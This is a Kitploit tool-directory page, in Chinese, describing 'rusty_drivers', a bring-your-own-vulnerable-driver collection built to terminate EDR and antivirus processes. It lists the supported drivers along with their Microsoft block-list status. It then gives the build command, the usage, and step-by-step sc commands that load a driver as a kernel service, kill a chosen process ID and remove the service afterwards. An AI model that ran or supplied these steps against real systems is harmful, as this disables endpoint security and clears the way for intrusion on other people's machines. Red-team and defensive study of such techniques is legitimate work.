Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
rusty_drivers — BYOVD 集合 | Kitploit
工具/GitHubGitHub/florianib/rusty_drivers
漏洞利用IDS/IPS规避后渗透利用红队对抗性攻击
GitHubflorianib/rusty_drivers

rusty_drivers

BYOVD 集合

查看仓库
24642年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RustyDrivers

该项目是一个 BYOVD 集合,专注于终止 EDR / AV 进程。

目前支持以下驱动程序:

驱动程序参数名称已阻止
Process Explorerprocess_explorer是
Genshin Impactgenshin是
Rentdrv2rentdrv2否
TrueSighttruesight否

“已阻止”表示该驱动程序位于 Microsoft 的阻止列表中,无法在最新版 Windows 上执行。

构建

root@kitploit:~
cargo build --release

用法

root@kitploit:~
rusty_drivers.exe --help            
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>

Options:
  -p, --pid <PID>
  -d, --driver <DRIVER>
  -h, --help             Print help
  -V, --version          Print version

示例

由于该可执行文件不会注册服务来利用驱动程序,因此需要手动完成此操作:

root@kitploit:~
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto

之后,可以启动该服务:

root@kitploit:~
sc start Test123

最后,要使用 Process Explorer 驱动程序终止 PID 为 1234 的进程,可以使用以下命令:

root@kitploit:~
rusty_drivers.exe --pid 1234 --driver process_explorer          

之后不要忘记清理该服务:

root@kitploit:~
sc stop Test123
sc delete Test123
下载工具